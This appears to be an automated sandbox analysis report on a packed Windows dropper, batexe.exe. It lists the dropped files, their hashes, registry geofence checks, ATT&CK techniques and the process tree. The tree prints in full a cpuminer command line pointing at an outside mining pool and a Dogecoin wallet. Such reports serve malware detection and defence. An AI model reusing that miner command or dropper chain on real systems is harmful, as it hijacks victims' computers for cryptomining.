73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 17:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1452	b2e.exe
5684	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5684	cpuminer-sse2.exe
5684	cpuminer-sse2.exe
5684	cpuminer-sse2.exe
5684	cpuminer-sse2.exe
5684	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2564-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 1452	2564	batexe.exe	86
PID 2564 wrote to memory of 1452	2564	batexe.exe	86
PID 2564 wrote to memory of 1452	2564	batexe.exe	86
PID 1452 wrote to memory of 1088	1452	b2e.exe	87
PID 1452 wrote to memory of 1088	1452	b2e.exe	87
PID 1452 wrote to memory of 1088	1452	b2e.exe	87
PID 1088 wrote to memory of 5684	1088	cmd.exe	90
PID 1088 wrote to memory of 5684	1088	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5DA1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1088
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe

Filesize
14.5MB

MD5
bd91236f4e55b2c33eb98367ea4bea8c

SHA1
8e44621dffb865cae51b3ebfbdec9ffc17fdeb1f

SHA256
f2295223065e2ad5da87d3227f5c684cd0385f34bb6de219fe37b9f5973a856a

SHA512
3b37111500223dcd4bedbb0dff8e7f7b14b0a764d00e8278fc0b3e35cff2bdb915693b57e287bd65a1b71e9f7c006488ad0f851a6322eff407999c33e2011af3

Download Submit
C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe

Filesize
2.6MB

MD5
e98e44315ddfa94a05c50226c5fa9049

SHA1
260b402c7f19603007ef02b07e3c3970f69b6b05

SHA256
68086b02190f450f56bb44e2b05b44c043bebb1501b3427a1d6fb281422b05f2

SHA512
6b1060691480e4fcebbf9fff2464afb5c41eaca743a671bf63a6562e3d8f9869753e709186f7b5780f17d8f5e52917e806527860fa888df90b6f5f85afc7ce1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5A55.tmp\b2e.exe

Filesize
2.6MB

MD5
a16d69a2ad3e9a04c2494cbbc70b10fa

SHA1
a5ac1eac7f0a7c66bb1b618f9cee0d9750776d90

SHA256
6fdaf24c654195b5759af78e7bc4de7714fcbf518cbf81866c909e61248fab14

SHA512
a51a3426e2821b239ec4c52a05b0184b1978300bce96940109e1921ac6a863e442753c5c9feddcfe2721bfb69869163c4e81e22be7032f0e22cb232050f987da

Download Submit
C:\Users\Admin\AppData\Local\Temp\5DA1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
424KB

MD5
35be4ee01e9b5bef09ff6bfed2e147d1

SHA1
31f9e46869abdfe682a0f7e83e3562f71d53bd0f

SHA256
6d9998ab506a1e2e132f7ad1a6eab90e534368a3d955a99f20a81a2602ee9c82

SHA512
3d921327131df071fd38d9e9c07afe7422dee5e676662f95a0fd87bf2ad8a644e6e9acbb9c4a987cf7d74d33bec791ae4d473683dfab774dc62d396c13410e20

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
380KB

MD5
9e141ee380df9cc03be8c6b340c92468

SHA1
612c170de66a79d00c9d94ce322f86b7b64f3b23

SHA256
8a909aac67cb7b4b74d6401b7f26d847e87da32c8deb34460572d9affa7d8d8c

SHA512
47624f31208b3c104b1761b6d498170c7d7634349add95f6ad83275aa4f8bb6ed11547ad10430beb10143b8e1284fe786e829db04ad74d0038bab274e2ea058d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
608KB

MD5
42ed2456c3aee7aca8acb0f2b8886d52

SHA1
a943d461ecddc84bb6644390697975143f6acfcc

SHA256
6c7e633de4c72d34feb2129e7781fb2664e1d48b830a6cfeccfde9e0f25d4d4c

SHA512
f06a06a3dc1ff7a2658ae363667d151dacfaa312e3342ada66c1fc3b307e2588fd6162928230894d3e1756cb4fb13cd37e8c5c1c3905122f26dead51121e435e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
268KB

MD5
6b98890a72850191cfc60a96d331ec23

SHA1
3903d32d3c882642cb9dfa42c8d7570f10d07643

SHA256
f34711a7f06daf996cd50e7aee156a7c3cfeabe0a4059e568f4ee3a86a497c42

SHA512
d7a0b0908569e895bee5fc36615b60decce14d1bb1f137f47b543eef13a0adb5fa70680480a47ccf345ac2f81cf044faf047d8a56335da4b4ec66e7820e940ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
556KB

MD5
7752aee4ec2aaf972eaca7657626ab4d

SHA1
39d48f175d5d2b63c33d6f56c0db76aece0a19db

SHA256
5c3fc30d5db9a75766dd3855ba0d786dabfa58dbc1d4cddca8ae73dc2ae10864

SHA512
76a9c26554aab66080742c881874be665bb3b571ff40baa086155ad1f765007eff4f439a73792060dbc7e0b0489284b7ae18faec06b93bae3381cc2108a95c34

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
8185100383d0fe360c9198e5a883b08d

SHA1
ab398c469573f8e84d3cfcef01287a0604d6ab5f

SHA256
05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

SHA512
24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
554KB

MD5
b5a8a368552cc7b91ff2c463a6b3c63f

SHA1
cfcb05fef3f5c8c501f15759fabc872045b01d7c

SHA256
cd47a5d821e377ffb0be37472e6f539462487de1c70bb701216ae5d780db3fd0

SHA512
50ca8931e2970f85989055c7488890493f2fb3b45e91fa95cca4b49f4ca489d6f6895c0603cdce32fef202a0904f16dc40f501f8ab64a2a5fd1e04c013be9dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
223KB

MD5
e2194f546a51547954102945322b34b7

SHA1
3bed01c95426fe9479e3f23ed6d5de3fcff87591

SHA256
10bb706f3361fd7bb07ecd6ab33c4bbe692ed8265d4e28a1a3ca6e7b052210b2

SHA512
51b9569231c4e7b4567e40880db0500d3c162ef345b2b1ec27631f3b383beec4e9c372dccfbe451c097fce2f8ad426e36a0fb5e1977f945287287fd260556b2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
218KB

MD5
eae368ecc699a9d30cf53bccbafdbcc8

SHA1
6bd90c5f2764a429fbb2d2b1adce190bbddc898d

SHA256
d0725558893203cb690df71d378dfe6dc707213fb07926ac7e7ced6c805458f7

SHA512
702be2ef014dd1ccde8ceb49c7ad2c8d45732f23615f90dc8176df485bfa7e7b3b220dcfb29594b18e1a6a18cc89d046faccf2ad9e1352d99797af4073a4a0ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
365KB

MD5
989307a8a710d64361263691d449dc55

SHA1
239033c5e2bddbe12dcfac2b6306b057e92a6c21

SHA256
e52ee5fb395f141be932bfdcbbbda06960e324240fc5d328d92845febcac221d

SHA512
02f13424400ff6a90d5e7d7c82625bf95c47131032573be4ea101770d75a557fdeebba3d7b9ddb64870ea6764c469e15c32e49ee32c825ee9b20b147580fa721

Download Submit
memory/1452-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1452-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2564-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5684-47-0x0000000001020000-0x00000000028D5000-memory.dmp

Filesize
24.7MB

Download
memory/5684-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5684-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-46-0x000000006DDE0000-0x000000006DE78000-memory.dmp

Filesize
608KB

Download
memory/5684-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5684-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5684-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download